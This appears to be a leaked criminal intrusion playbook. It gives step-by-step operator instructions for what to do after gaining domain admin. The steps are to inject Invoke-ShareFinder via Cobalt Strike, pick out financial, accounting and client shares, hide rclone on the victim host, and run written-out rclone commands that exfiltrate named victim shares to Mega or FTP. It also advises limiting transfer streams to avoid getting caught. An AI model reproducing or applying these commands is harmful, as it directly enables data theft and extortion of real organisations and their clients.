1) After we escalated privileges, found the Domain Admin, we pull the sessions into the cobalt
2) Use Domain Admin token and check network shares : 
    *powershell-import - upload there ShareFinder as usual and run - 
psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt

Next, we should check network shares, we are interested in 
*Financial documents
*Accounting
*IT
*Clients
*Projects 
And so on, it all depends on what our target is doing

Next we do the following > here is the Diablo Manual, everything is easy to understand:

Rclone
In order to start downloading through rclone you need to create a config
to create a config open cmd go to the directory where rclone.exe is located
Run rclone.exe with the command : rclone config
then select new remote in the menu that appears
call it mega then enter mega again
then enter the mega mail address after it will ask for a password to enter or generate, we choose ours with the letter 'Y'. 
the pass will not appear on insertion, but it is still inserted there
After creating a config, we are thrown back to the main menu and we can close the рclone.
Then enter this command "rclone.exe config show" it will show the config that we created
we copy it and create a file rclone.conf where we put this information.
After we have found network shares we are interested in, we upload the exe and config to the target machine with the rights to hide the config and the exe so that they are not found
Go to the exe directory and run the command: shell rclone.exe copy "\\envisionpharma.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
where: \\envisionpharma.com\IT\KLSHARE are network shares
Mega:Finanse file location in mega (can create a folder in mega on its own, it is only necessary to specify it here)
streams 12 --transfers 12 this is the number of simultaneous upload streams at maximum (12) I do not recommend because you can easily get caught 



shell rclone.exe copy "\\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3  - here is an example with FTP

!!!THE RCLONE ITSELF WEIGHS ABOUT 50MB, THE LINK TO IT WILL BE BELOW THE POST!!!
